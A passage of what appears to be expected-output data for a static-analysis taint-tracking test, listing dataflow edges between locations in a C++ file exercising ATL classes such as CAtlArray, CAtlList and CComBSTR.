CAtlArray | atl.cpp:233:5:233:6 | a3 | | -| atl.cpp:231:20:231:21 | call to CAtlArray | atl.cpp:234:10:234:11 | a3 | | -| atl.cpp:231:20:231:21 | call to CAtlArray | atl.cpp:236:10:236:11 | a3 | | -| atl.cpp:231:20:231:21 | call to CAtlArray | atl.cpp:237:11:237:12 | a3 | | -| atl.cpp:231:20:231:21 | call to CAtlArray | atl.cpp:241:26:241:27 | a3 | | -| atl.cpp:231:20:231:21 | call to CAtlArray | atl.cpp:243:3:243:3 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:233:5:233:6 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:236:10:236:11 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:237:11:237:12 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:241:26:241:27 | a3 | | -| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:243:3:243:3 | a3 | | -| atl.cpp:233:5:233:6 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | -| atl.cpp:233:5:233:6 | ref arg a3 | atl.cpp:236:10:236:11 | a3 | | -| atl.cpp:233:5:233:6 | ref arg a3 | atl.cpp:237:11:237:12 | a3 | | -| atl.cpp:233:5:233:6 | ref arg a3 | atl.cpp:241:26:241:27 | a3 | | -| atl.cpp:233:5:233:6 | ref arg a3 | atl.cpp:243:3:243:3 | a3 | | -| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:236:10:236:11 | a3 | | -| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:237:11:237:12 | a3 | | -| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:241:26:241:27 | a3 | | -| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:243:3:243:3 | a3 | | -| atl.cpp:236:10:236:11 | ref arg a3 | atl.cpp:237:11:237:12 | a3 | | -| atl.cpp:236:10:236:11 | ref arg a3 | atl.cpp:241:26:241:27 | a3 | | -| atl.cpp:236:10:236:11 | ref arg a3 | atl.cpp:243:3:243:3 | a3 | | -| atl.cpp:237:11:237:12 | ref arg a3 | atl.cpp:241:26:241:27 | a3 | | -| atl.cpp:237:11:237:12 | ref arg a3 | atl.cpp:243:3:243:3 | a3 | | -| atl.cpp:237:14:237:20 | call to GetData | atl.cpp:237:10:237:22 | * ... | TAINT | -| atl.cpp:239:20:239:21 | call to CAtlArray | atl.cpp:240:10:240:11 | a4 | | -| atl.cpp:239:20:239:21 | call to CAtlArray | atl.cpp:241:5:241:6 | a4 | | -| atl.cpp:239:20:239:21 | call to CAtlArray | atl.cpp:242:10:242:11 | a4 | | -| atl.cpp:239:20:239:21 | call to CAtlArray | atl.cpp:243:3:243:3 | a4 | | -| atl.cpp:240:10:240:11 | ref arg a4 | atl.cpp:241:5:241:6 | a4 | | -| atl.cpp:240:10:240:11 | ref arg a4 | atl.cpp:242:10:242:11 | a4 | | -| atl.cpp:240:10:240:11 | ref arg a4 | atl.cpp:243:3:243:3 | a4 | | -| atl.cpp:241:5:241:6 | ref arg a4 | atl.cpp:242:10:242:11 | a4 | | -| atl.cpp:241:5:241:6 | ref arg a4 | atl.cpp:243:3:243:3 | a4 | | -| atl.cpp:241:26:241:27 | a3 | atl.cpp:241:25:241:27 | & ... | | -| atl.cpp:242:10:242:11 | ref arg a4 | atl.cpp:243:3:243:3 | a4 | | -| atl.cpp:245:20:245:21 | call to CAtlArray | atl.cpp:246:5:246:6 | a5 | | -| atl.cpp:245:20:245:21 | call to CAtlArray | atl.cpp:247:10:247:11 | a5 | | -| atl.cpp:245:20:245:21 | call to CAtlArray | atl.cpp:252:3:252:3 | a5 | | -| atl.cpp:246:5:246:6 | ref arg a5 | atl.cpp:247:10:247:11 | a5 | | -| atl.cpp:246:5:246:6 | ref arg a5 | atl.cpp:252:3:252:3 | a5 | | -| atl.cpp:247:10:247:11 | ref arg a5 | atl.cpp:252:3:252:3 | a5 | | -| atl.cpp:249:20:249:21 | call to CAtlArray | atl.cpp:250:5:250:6 | a6 | | -| atl.cpp:249:20:249:21 | call to CAtlArray | atl.cpp:251:10:251:11 | a6 | | -| atl.cpp:249:20:249:21 | call to CAtlArray | atl.cpp:252:3:252:3 | a6 | | -| atl.cpp:250:5:250:6 | ref arg a6 | atl.cpp:251:10:251:11 | a6 | | -| atl.cpp:250:5:250:6 | ref arg a6 | atl.cpp:252:3:252:3 | a6 | | -| atl.cpp:251:10:251:11 | ref arg a6 | atl.cpp:252:3:252:3 | a6 | | -| atl.cpp:297:11:297:21 | call to source | atl.cpp:301:18:301:18 | x | | -| atl.cpp:297:11:297:21 | call to source | atl.cpp:309:19:309:19 | x | | -| atl.cpp:297:11:297:21 | call to source | atl.cpp:318:29:318:29 | x | | -| atl.cpp:297:11:297:21 | call to source | atl.cpp:324:21:324:21 | x | | -| atl.cpp:297:11:297:21 | call to source | atl.cpp:332:30:332:30 | x | | -| atl.cpp:297:11:297:21 | call to source | atl.cpp:339:31:339:31 | x | | -| atl.cpp:297:11:297:21 | call to source | atl.cpp:344:44:344:44 | x | | -| atl.cpp:299:24:299:25 | 10 | atl.cpp:299:24:299:26 | call to CAtlList | TAINT | -| atl.cpp:299:24:299:26 | call to CAtlList | atl.cpp:300:10:300:13 | list | | -| atl.cpp:299:24:299:26 | call to CAtlList | atl.cpp:301:5:301:8 | list | | -| atl.cpp:299:24:299:26 | call to CAtlList | atl.cpp:302:10:302:13 | list | | -| atl.cpp:299:24:299:26 | call to CAtlList | atl.cpp:305:24:305:27 | list | | -| atl.cpp:299:24:299:26 | call to CAtlList | atl.cpp:347:3:347:3 | list | | -| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:301:5:301:8 | list | | -| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:302:10:302:13 | list | | -| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:305:24:305:27 | list | | -| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:347:3:347:3 | list | | -| atl.cpp:301:5:301:8 | ref arg list | atl.cpp:302:10:302:13 | list | | -| atl.cpp:301:5:301:8 | ref arg list | atl.cpp:305:24:305:27 | list | | -| atl.cpp:301:5:301:8 | ref arg list | atl.cpp:347:3:347:3 | list | | -| atl.cpp:302:10:302:13 | ref arg list | atl.cpp:305:24:305:27 | list | | -| atl.cpp:302:10:302:13 | ref arg list | atl.cpp:347:3:347:3 | list | | -| atl.cpp:304:25:304:26 | 10 | atl.cpp:304:25:304:27 | call to CAtlList | TAINT | -| atl.cpp:304:25:304:27 | call to CAtlList | atl.cpp:305:5:305:9 | list2 | | -| atl.cpp:304:25:304:27 | call to CAtlList | atl.cpp:306:10:306:14 | list2 | | -| atl.cpp:304:25:304:27 | call to CAtlList | atl.cpp:347:3:347:3 | list2 | | -| atl.cpp:305:5:305:9 | ref arg list2 | atl.cpp:306:10:306:14 | list2 | | -| atl.cpp:305:5:305:9 | ref arg list2 | atl.cpp:347:3:347:3 | list2 | | -| atl.cpp:305:24:305:27 | list | atl.cpp:305:23:305:27 | & ... | | -| atl.cpp:306:10:306:14 | ref arg list2 | atl.cpp:347:3:347:3 | list2 | | -| atl.cpp:308:25:308:26 | 10 | atl.cpp:308:25:308:27 | call to CAtlList | TAINT | -| atl.cpp:308:25:308:27 | call to CAtlList | atl.cpp:309:5:309:9 | list3 | | -| atl.cpp:308:25:308:27 | call to CAtlList | atl.cpp:310:10:310:14 | list3 | | -| atl.cpp:308:25:308:27 | call to CAtlList | atl.cpp:313:24:313:28 | list3 | | -| atl.cpp:308:25:308:27 | call to CAtlList | atl.cpp:347:3:347:3 | list3 | | -| atl.cpp:309:5:309:9 | ref arg list3 | atl.cpp:310:10:310:14 | list3 | | -| atl.cpp:309:5:309:9 | ref arg list3 | atl.cpp:313:24:313:28 | list3 | | -| atl.cpp:309:5:309:9 | ref arg list3 | atl.cpp:347:3:347:3 | list3 | | -| atl.cpp:310:10:310:14 | ref arg list3 | atl.cpp:313:24:313:28 | list3 | | -| atl.cpp:310:10:310:14 | ref arg list3 | atl.cpp:347:3:347:3 | list3 | | -| atl.cpp:312:25:312:26 | 10 | atl.cpp:312:25:312:27 | call to CAtlList | TAINT | -| atl.cpp:312:25:312:27 | call to CAtlList | atl.cpp:313:5:313:9 | list4 | | -| atl.cpp:312:25:312:27 | call to CAtlList | atl.cpp:314:10:314:14 | list4 | | -| atl.cpp:312:25:312:27 | call to CAtlList | atl.cpp:347:3:347:3 | list4 | | -| atl.cpp:313:5:313:9 | ref arg list4 | atl.cpp:314:10:314:14 | list4 | | -| atl.cpp:313:5:313:9 | ref arg list4 | atl.cpp:347:3:347:3 | list4 | | -| atl.cpp:313:24:313:28 | list3 | atl.cpp:313:23:313:28 | & ... | | -| atl.cpp:314:10:314:14 | ref arg list4 | atl.cpp:347:3:347:3 | list4 | | -| atl.cpp:317:27:317:28 | 10 | atl.cpp:317:27:317:29 | call to CAtlList | TAINT | -| atl.cpp:317:27:317:29 | call to CAtlList | atl.cpp:318:18:318:22 | list5 | | -| atl.cpp:317:27:317:29 | call to CAtlList | atl.cpp:318:32:318:36 | list5 | | -| atl.cpp:317:27:317:29 | call to CAtlList | atl.cpp:319:12:319:16 | list5 | | -| atl.cpp:317:27:317:29 | call to CAtlList | atl.cpp:320:5:320:5 | list5 | | -| atl.cpp:318:18:318:22 | ref arg list5 | atl.cpp:319:12:319:16 | list5 | | -| atl.cpp:318:18:318:22 | ref arg list5 | atl.cpp:320:5:320:5 | list5 | | -| atl.cpp:318:24:318:27 | call to Find | atl.cpp:319:24:319:26 | pos | | -| atl.cpp:318:32:318:36 | ref arg list5 | atl.cpp:318:18:318:22 | list5 | | -| atl.cpp:318:32:318:36 | ref arg list5 | atl.cpp:319:12:319:16 | list5 | | -| atl.cpp:318:32:318:36 | ref arg list5 | atl.cpp:320:5:320:5 | list5 | | -| atl.cpp:319:12:319:16 | ref arg list5 | atl.cpp:320:5:320:5 | list5 | | -| atl.cpp:323:27:323:28 | 10 | atl.cpp:323:27:323:29 | call to CAtlList | TAINT | -| atl.cpp:323:27:323:29 | call to CAtlList | atl.cpp:324:7:324:11 | list6 | | -| atl.cpp:323:27:323:29 | call to CAtlList | atl.cpp:325:18:325:22 | list6 | | -| atl.cpp:323:27:323:29 | call to CAtlList | atl.cpp:326:12:326:16 | list6 | | -| atl.cpp:323:27:323:29 | call to CAtlList | atl.cpp:327:5:327:5 | list6 | | -| atl.cpp:324:7:324:11 | ref arg list6 | atl.cpp:325:18:325:22 | list6 | | -| atl.cpp:324:7:324:11 | ref arg list6 | atl.cpp:326:12:326:16 | list6 | | -| atl.cpp:324:7:324:11 | ref arg list6 | atl.cpp:327:5:327:5 | list6 | | -| atl.cpp:325:18:325:22 | ref arg list6 | atl.cpp:326:12:326:16 | list6 | | -| atl.cpp:325:18:325:22 | ref arg list6 | atl.cpp:327:5:327:5 | list6 | | -| atl.cpp:325:24:325:32 | call to FindIndex | atl.cpp:326:24:326:26 | pos | | -| atl.cpp:326:12:326:16 | ref arg list6 | atl.cpp:327:5:327:5 | list6 | | -| atl.cpp:330:27:330:28 | 10 | atl.cpp:330:27:330:29 | call to CAtlList | TAINT | -| atl.cpp:330:27:330:29 | call to CAtlList | atl.cpp:331:18:331:22 | list7 | | -| atl.cpp:330:27:330:29 | call to CAtlList | atl.cpp:332:7:332:11 | list7 | | -| atl.cpp:330:27:330:29 | call to CAtlList | atl.cpp:333:12:333:16 | list7 | | -| atl.cpp:330:27:330:29 | call to CAtlList | atl.cpp:334:5:334:5 | list7 | | -| atl.cpp:331:18:331:22 | ref arg list7 | atl.cpp:332:7:332:11 | list7 | | -| atl.cpp:331:18:331:22 | ref arg list7 | atl.cpp:333:12:333:16 | list7 | | -| atl.cpp:331:18:331:22 | ref arg list7 | atl.cpp:334:5:334:5 | list7 | | -| atl.cpp:331:24:331:38 | call to GetTailPosition | atl.cpp:332:25:332:27 | pos | | -| atl.cpp:332:7:332:11 | ref arg list7 | atl.cpp:333:12:333:16 | list7 | | -| atl.cpp:332:7:332:11 | ref arg list7 | atl.cpp:334:5:334:5 | list7 | | -| atl.cpp:333:12:333:16 | ref arg list7 | atl.cpp:334:5:334:5 | list7 | | -| atl.cpp:337:27:337:28 | 10 | atl.cpp:337:27:337:29 | call to CAtlList | TAINT | -| atl.cpp:337:27:337:29 | call to CAtlList | atl.cpp:338:18:338:22 | list8 | | -| atl.cpp:337:27:337:29 | call to CAtlList | atl.cpp:339:7:339:11 | list8 | | -| atl.cpp:337:27:337:29 | call to CAtlList | atl.cpp:340:12:340:16 | list8 | | -| atl.cpp:337:27:337:29 | call to CAtlList | atl.cpp:341:5:341:5 | list8 | | -| atl.cpp:338:18:338:22 | ref arg list8 | atl.cpp:339:7:339:11 | list8 | | -| atl.cpp:338:18:338:22 | ref arg list8 | atl.cpp:340:12:340:16 | list8 | | -| atl.cpp:338:18:338:22 | ref arg list8 | atl.cpp:341:5:341:5 | list8 | | -| atl.cpp:338:24:338:38 | call to GetTailPosition | atl.cpp:339:26:339:28 | pos | | -| atl.cpp:339:7:339:11 | ref arg list8 | atl.cpp:340:12:340:16 | list8 | | -| atl.cpp:339:7:339:11 | ref arg list8 | atl.cpp:341:5:341:5 | list8 | | -| atl.cpp:340:12:340:16 | ref arg list8 | atl.cpp:341:5:341:5 | list8 | | -| atl.cpp:343:27:343:28 | 10 | atl.cpp:343:27:343:29 | call to CAtlList | TAINT | -| atl.cpp:343:27:343:29 | call to CAtlList | atl.cpp:344:7:344:11 | list9 | | -| atl.cpp:343:27:343:29 | call to CAtlList | atl.cpp:344:19:344:23 | list9 | | -| atl.cpp:343:27:343:29 | call to CAtlList | atl.cpp:345:12:345:16 | list9 | | -| atl.cpp:343:27:343:29 | call to CAtlList | atl.cpp:346:5:346:5 | list9 | | -| atl.cpp:344:7:344:11 | ref arg list9 | atl.cpp:345:12:345:16 | list9 | | -| atl.cpp:344:7:344:11 | ref arg list9 | atl.cpp:346:5:346:5 | list9 | | -| atl.cpp:344:19:344:23 | ref arg list9 | atl.cpp:344:7:344:11 | list9 | | -| atl.cpp:344:19:344:23 | ref arg list9 | atl.cpp:345:12:345:16 | list9 | | -| atl.cpp:344:19:344:23 | ref arg list9 | atl.cpp:346:5:346:5 | list9 | | -| atl.cpp:345:12:345:16 | ref arg list9 | atl.cpp:346:5:346:5 | list9 | | -| atl.cpp:349:12:349:31 | call to indirect_source | atl.cpp:353:18:353:18 | p | | -| atl.cpp:349:12:349:31 | call to indirect_source | atl.cpp:361:19:361:19 | p | | -| atl.cpp:349:12:349:31 | call to indirect_source | atl.cpp:370:29:370:29 | p | | -| atl.cpp:349:12:349:31 | call to indirect_source | atl.cpp:376:21:376:21 | p | | -| atl.cpp:349:12:349:31 | call to indirect_source | atl.cpp:384:30:384:30 | p | | -| atl.cpp:349:12:349:31 | call to indirect_source | atl.cpp:391:31:391:31 | p | | -| atl.cpp:349:12:349:31 | call to indirect_source | atl.cpp:396:44:396:44 | p | | -| atl.cpp:351:25:351:26 | 10 | atl.cpp:351:25:351:27 | call to CAtlList | TAINT | -| atl.cpp:351:25:351:27 | call to CAtlList | atl.cpp:352:10:352:13 | list | | -| atl.cpp:351:25:351:27 | call to CAtlList | atl.cpp:353:5:353:8 | list | | -| atl.cpp:351:25:351:27 | call to CAtlList | atl.cpp:354:10:354:13 | list | | -| atl.cpp:351:25:351:27 | call to CAtlList | atl.cpp:357:24:357:27 | list | | -| atl.cpp:351:25:351:27 | call to CAtlList | atl.cpp:399:3:399:3 | list | | -| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:353:5:353:8 | list | | -| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:354:10:354:13 | list | | -| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:357:24:357:27 | list | | -| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:399:3:399:3 | list | | -| atl.cpp:353:5:353:8 | ref arg list | atl.cpp:354:10:354:13 | list | | -| atl.cpp:353:5:353:8 | ref arg list | atl.cpp:357:24:357:27 | list | | -| atl.cpp:353:5:353:8 | ref arg list | atl.cpp:399:3:399:3 | list | | -| atl.cpp:354:10:354:13 | ref arg list | atl.cpp:357:24:357:27 | list | | -| atl.cpp:354:10:354:13 | ref arg list | atl.cpp:399:3:399:3 | list | | -| atl.cpp:356:26:356:27 | 10 | atl.cpp:356:26:356:28 | call to CAtlList | TAINT | -| atl.cpp:356:26:356:28 | call to CAtlList | atl.cpp:357:5:357:9 | list2 | | -| atl.cpp:356:26:356:28 | call to CAtlList | atl.cpp:358:10:358:14 | list2 | | -| atl.cpp:356:26:356:28 | call to CAtlList | atl.cpp:399:3:399:3 | list2 | | -| atl.cpp:357:5:357:9 | ref arg list2 | atl.cpp:358:10:358:14 | list2 | | -| atl.cpp:357:5:357:9 | ref arg list2 | atl.cpp:399:3:399:3 | list2 | | -| atl.cpp:357:24:357:27 | list | atl.cpp:357:23:357:27 | & ... | | -| atl.cpp:358:10:358:14 | ref arg list2 | atl.cpp:399:3:399:3 | list2 | | -| atl.cpp:360:26:360:27 | 10 | atl.cpp:360:26:360:28 | call to CAtlList | TAINT | -| atl.cpp:360:26:360:28 | call to CAtlList | atl.cpp:361:5:361:9 | list3 | | -| atl.cpp:360:26:360:28 | call to CAtlList | atl.cpp:362:10:362:14 | list3 | | -| atl.cpp:360:26:360:28 | call to CAtlList | atl.cpp:365:24:365:28 | list3 | | -| atl.cpp:360:26:360:28 | call to CAtlList | atl.cpp:399:3:399:3 | list3 | | -| atl.cpp:361:5:361:9 | ref arg list3 | atl.cpp:362:10:362:14 | list3 | | -| atl.cpp:361:5:361:9 | ref arg list3 | atl.cpp:365:24:365:28 | list3 | | -| atl.cpp:361:5:361:9 | ref arg list3 | atl.cpp:399:3:399:3 | list3 | | -| atl.cpp:362:10:362:14 | ref arg list3 | atl.cpp:365:24:365:28 | list3 | | -| atl.cpp:362:10:362:14 | ref arg list3 | atl.cpp:399:3:399:3 | list3 | | -| atl.cpp:364:26:364:27 | 10 | atl.cpp:364:26:364:28 | call to CAtlList | TAINT | -| atl.cpp:364:26:364:28 | call to CAtlList | atl.cpp:365:5:365:9 | list4 | | -| atl.cpp:364:26:364:28 | call to CAtlList | atl.cpp:366:10:366:14 | list4 | | -| atl.cpp:364:26:364:28 | call to CAtlList | atl.cpp:399:3:399:3 | list4 | | -| atl.cpp:365:5:365:9 | ref arg list4 | atl.cpp:366:10:366:14 | list4 | | -| atl.cpp:365:5:365:9 | ref arg list4 | atl.cpp:399:3:399:3 | list4 | | -| atl.cpp:365:24:365:28 | list3 | atl.cpp:365:23:365:28 | & ... | | -| atl.cpp:366:10:366:14 | ref arg list4 | atl.cpp:399:3:399:3 | list4 | | -| atl.cpp:369:28:369:29 | 10 | atl.cpp:369:28:369:30 | call to CAtlList | TAINT | -| atl.cpp:369:28:369:30 | call to CAtlList | atl.cpp:370:18:370:22 | list5 | | -| atl.cpp:369:28:369:30 | call to CAtlList | atl.cpp:370:32:370:36 | list5 | | -| atl.cpp:369:28:369:30 | call to CAtlList | atl.cpp:371:12:371:16 | list5 | | -| atl.cpp:369:28:369:30 | call to CAtlList | atl.cpp:372:5:372:5 | list5 | | -| atl.cpp:370:18:370:22 | ref arg list5 | atl.cpp:371:12:371:16 | list5 | | -| atl.cpp:370:18:370:22 | ref arg list5 | atl.cpp:372:5:372:5 | list5 | | -| atl.cpp:370:24:370:27 | call to Find | atl.cpp:371:24:371:26 | pos | | -| atl.cpp:370:32:370:36 | ref arg list5 | atl.cpp:370:18:370:22 | list5 | | -| atl.cpp:370:32:370:36 | ref arg list5 | atl.cpp:371:12:371:16 | list5 | | -| atl.cpp:370:32:370:36 | ref arg list5 | atl.cpp:372:5:372:5 | list5 | | -| atl.cpp:371:12:371:16 | ref arg list5 | atl.cpp:372:5:372:5 | list5 | | -| atl.cpp:375:28:375:29 | 10 | atl.cpp:375:28:375:30 | call to CAtlList | TAINT | -| atl.cpp:375:28:375:30 | call to CAtlList | atl.cpp:376:7:376:11 | list6 | | -| atl.cpp:375:28:375:30 | call to CAtlList | atl.cpp:377:18:377:22 | list6 | | -| atl.cpp:375:28:375:30 | call to CAtlList | atl.cpp:378:12:378:16 | list6 | | -| atl.cpp:375:28:375:30 | call to CAtlList | atl.cpp:379:5:379:5 | list6 | | -| atl.cpp:376:7:376:11 | ref arg list6 | atl.cpp:377:18:377:22 | list6 | | -| atl.cpp:376:7:376:11 | ref arg list6 | atl.cpp:378:12:378:16 | list6 | | -| atl.cpp:376:7:376:11 | ref arg list6 | atl.cpp:379:5:379:5 | list6 | | -| atl.cpp:377:18:377:22 | ref arg list6 | atl.cpp:378:12:378:16 | list6 | | -| atl.cpp:377:18:377:22 | ref arg list6 | atl.cpp:379:5:379:5 | list6 | | -| atl.cpp:377:24:377:32 | call to FindIndex | atl.cpp:378:24:378:26 | pos | | -| atl.cpp:378:12:378:16 | ref arg list6 | atl.cpp:379:5:379:5 | list6 | | -| atl.cpp:382:28:382:29 | 10 | atl.cpp:382:28:382:30 | call to CAtlList | TAINT | -| atl.cpp:382:28:382:30 | call to CAtlList | atl.cpp:383:18:383:22 | list7 | | -| atl.cpp:382:28:382:30 | call to CAtlList | atl.cpp:384:7:384:11 | list7 | | -| atl.cpp:382:28:382:30 | call to CAtlList | atl.cpp:385:12:385:16 | list7 | | -| atl.cpp:382:28:382:30 | call to CAtlList | atl.cpp:386:5:386:5 | list7 | | -| atl.cpp:383:18:383:22 | ref arg list7 | atl.cpp:384:7:384:11 | list7 | | -| atl.cpp:383:18:383:22 | ref arg list7 | atl.cpp:385:12:385:16 | list7 | | -| atl.cpp:383:18:383:22 | ref arg list7 | atl.cpp:386:5:386:5 | list7 | | -| atl.cpp:383:24:383:38 | call to GetTailPosition | atl.cpp:384:25:384:27 | pos | | -| atl.cpp:384:7:384:11 | ref arg list7 | atl.cpp:385:12:385:16 | list7 | | -| atl.cpp:384:7:384:11 | ref arg list7 | atl.cpp:386:5:386:5 | list7 | | -| atl.cpp:385:12:385:16 | ref arg list7 | atl.cpp:386:5:386:5 | list7 | | -| atl.cpp:389:28:389:29 | 10 | atl.cpp:389:28:389:30 | call to CAtlList | TAINT | -| atl.cpp:389:28:389:30 | call to CAtlList | atl.cpp:390:18:390:22 | list8 | | -| atl.cpp:389:28:389:30 | call to CAtlList | atl.cpp:391:7:391:11 | list8 | | -| atl.cpp:389:28:389:30 | call to CAtlList | atl.cpp:392:12:392:16 | list8 | | -| atl.cpp:389:28:389:30 | call to CAtlList | atl.cpp:393:5:393:5 | list8 | | -| atl.cpp:390:18:390:22 | ref arg list8 | atl.cpp:391:7:391:11 | list8 | | -| atl.cpp:390:18:390:22 | ref arg list8 | atl.cpp:392:12:392:16 | list8 | | -| atl.cpp:390:18:390:22 | ref arg list8 | atl.cpp:393:5:393:5 | list8 | | -| atl.cpp:390:24:390:38 | call to GetTailPosition | atl.cpp:391:26:391:28 | pos | | -| atl.cpp:391:7:391:11 | ref arg list8 | atl.cpp:392:12:392:16 | list8 | | -| atl.cpp:391:7:391:11 | ref arg list8 | atl.cpp:393:5:393:5 | list8 | | -| atl.cpp:392:12:392:16 | ref arg list8 | atl.cpp:393:5:393:5 | list8 | | -| atl.cpp:395:28:395:29 | 10 | atl.cpp:395:28:395:30 | call to CAtlList | TAINT | -| atl.cpp:395:28:395:30 | call to CAtlList | atl.cpp:396:7:396:11 | list9 | | -| atl.cpp:395:28:395:30 | call to CAtlList | atl.cpp:396:19:396:23 | list9 | | -| atl.cpp:395:28:395:30 | call to CAtlList | atl.cpp:397:12:397:16 | list9 | | -| atl.cpp:395:28:395:30 | call to CAtlList | atl.cpp:398:5:398:5 | list9 | | -| atl.cpp:396:7:396:11 | ref arg list9 | atl.cpp:397:12:397:16 | list9 | | -| atl.cpp:396:7:396:11 | ref arg list9 | atl.cpp:398:5:398:5 | list9 | | -| atl.cpp:396:19:396:23 | ref arg list9 | atl.cpp:396:7:396:11 | list9 | | -| atl.cpp:396:19:396:23 | ref arg list9 | atl.cpp:397:12:397:16 | list9 | | -| atl.cpp:396:19:396:23 | ref arg list9 | atl.cpp:398:5:398:5 | list9 | | -| atl.cpp:397:12:397:16 | ref arg list9 | atl.cpp:398:5:398:5 | list9 | | -| atl.cpp:455:21:455:33 | new | atl.cpp:456:3:456:6 | safe | | -| atl.cpp:455:21:455:33 | new | atl.cpp:457:10:457:13 | safe | | -| atl.cpp:456:3:456:6 | safe [post update] | atl.cpp:457:10:457:13 | safe | | -| atl.cpp:456:3:456:40 | ... = ... | atl.cpp:456:9:456:14 | pvData [post update] | | -| atl.cpp:456:18:456:38 | call to indirect_source | atl.cpp:456:3:456:40 | ... = ... | | -| atl.cpp:461:13:461:33 | call to indirect_source | atl.cpp:463:16:463:16 | x | | -| atl.cpp:461:13:461:33 | call to indirect_source | atl.cpp:470:20:470:20 | x | | -| atl.cpp:461:13:461:33 | call to indirect_source | atl.cpp:474:16:474:16 | x | | -| atl.cpp:461:13:461:33 | call to indirect_source | atl.cpp:482:11:482:11 | x | | -| atl.cpp:461:13:461:33 | call to indirect_source | atl.cpp:496:20:496:20 | x | | -| atl.cpp:463:16:463:16 | x | atl.cpp:463:16:463:17 | call to CComBSTR | TAINT | -| atl.cpp:463:16:463:17 | call to CComBSTR | atl.cpp:464:10:464:10 | b | | -| atl.cpp:463:16:463:17 | call to CComBSTR | atl.cpp:466:17:466:17 | b | | -| atl.cpp:463:16:463:17 | call to CComBSTR | atl.cpp:468:3:468:3 | b | | -| atl.cpp:464:10:464:10 | b [post update] | atl.cpp:466:17:466:17 | b | | -| atl.cpp:464:10:464:10 | b [post update] | atl.cpp:468:3:468:3 | b | | -| atl.cpp:464:12:464:16 | ref arg m_str | atl.cpp:467:13:467:17 | m_str | | -| atl.cpp:466:17:466:17 | b | atl.cpp:466:17:466:18 | call to CComBSTR | | -| atl.cpp:466:17:466:18 | call to CComBSTR | atl.cpp:467:10:467:11 | b2 | | -| atl.cpp:466:17:466:18 | call to CComBSTR | atl.cpp:468:3:468:3 | b2 | | -| atl.cpp:467:10:467:11 | b2 [post update] | atl.cpp:468:3:468:3 | b2 | | -| atl.cpp:470:16:470:21 | call to CComBSTR | atl.cpp:471:10:471:10 | b | | -| atl.cpp:470:16:470:21 | call to CComBSTR | atl.cpp:472:3:472:3 | b | | -| atl.cpp:471:10:471:10 | b [post update] | atl.cpp:472:3:472:3 | b | | -| atl.cpp:474:16:474:16 | x | atl.cpp:474:16:474:17 | call to CComBSTR | TAINT | -| atl.cpp:474:16:474:17 | call to CComBSTR | atl.cpp:478:11:478:11 | b | | -| atl.cpp:474:16:474:17 | call to CComBSTR | atl.cpp:514:3:514:3 | b | | -| atl.cpp:476:14:476:15 | call to CComBSTR | atl.cpp:477:10:477:11 | b2 | | -| atl.cpp:476:14:476:15 | call to CComBSTR | atl.cpp:478:5:478:6 | b2 | | -| atl.cpp:476:14:476:15 | call to CComBSTR | atl.cpp:479:10:479:11 | b2 | | -| atl.cpp:476:14:476:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b2 | | -| atl.cpp:477:10:477:11 | b2 [post update] | atl.cpp:478:5:478:6 | b2 | | -| atl.cpp:477:10:477:11 | b2 [post update] | atl.cpp:479:10:479:11 | b2 | | -| atl.cpp:477:10:477:11 | b2 [post update] | atl.cpp:514:3:514:3 | b2 | | -| atl.cpp:477:13:477:17 | ref arg m_str | atl.cpp:479:13:479:17 | m_str | | -| atl.cpp:478:5:478:6 | ref arg b2 | atl.cpp:479:10:479:11 | b2 | | -| atl.cpp:478:5:478:6 | ref arg b2 | atl.cpp:514:3:514:3 | b2 | | -| atl.cpp:479:10:479:11 | b2 [post update] | atl.cpp:514:3:514:3 | b2 | | -| atl.cpp:481:14:481:15 | call to CComBSTR | atl.cpp:482:5:482:6 | b3 | | -| atl.cpp:481:14:481:15 | call to CComBSTR | atl.cpp:483:10:483:11 | b3 | | -| atl.cpp:481:14:481:15 | call to CComBSTR | atl.cpp:484:28:484:29 | b3 | | -| atl.cpp:481:14:481:15 | call to CComBSTR | atl.cpp:485:13:485:14 | b3 | | -| atl.cpp:481:14:481:15 | call to CComBSTR | atl.cpp:514:3:514:3 | b3 | | -| atl.cpp:482:5:482:6 | ref arg b3 | atl.cpp:483:10:483:11 | b3 | | -| atl.cpp:482:5:482:6 | ref arg b3 | atl.cpp:484:28:484:29 | b3 | | -| atl.cpp:482:5:482:6 | ref arg b3 | atl.cpp:485:13:485:14 | b3 | | -| atl.cpp:482:5:482:6 | ref arg b3 | atl.cpp:514:3:514:3 | b3 | | -| atl.cpp:482:11:482:11 | x | atl.cpp:482:11:482:11 | call to CComBSTR | TAINT | -| atl.cpp:483:10:483:11 | b3 [post update] | atl.cpp:484:28:484:29 | b3 | | -| atl.cpp:483:10:483:11 | b3 [post update] | atl.cpp:485:13:485:14 | b3 | | -| atl.cpp:483:10:483:11 | b3 [post update] | atl.cpp:514:3:514:3 | b3 | | -| atl.cpp:484:28:484:29 | ref arg b3 | atl.cpp:485:13:485:14 | b3 | | -| atl.cpp:484:28:484:29 | ref arg b3 | atl.cpp:514:3:514:3 | b3 | | -| atl.cpp:485:11:485:14 | * ... | atl.cpp:485:10:485:14 | * ... | TAINT | -| atl.cpp:485:12:485:12 | call to operator& | atl.cpp:485:11:485:14 | * ... | TAINT | -| atl.cpp:485:13:485:14 | ref arg b3 | atl.cpp:514:3:514:3 | b3 | | -| atl.cpp:487:14:487:15 | call to CComBSTR | atl.cpp:488:5:488:6 | b4 | | -| atl.cpp:487:14:487:15 | call to CComBSTR | 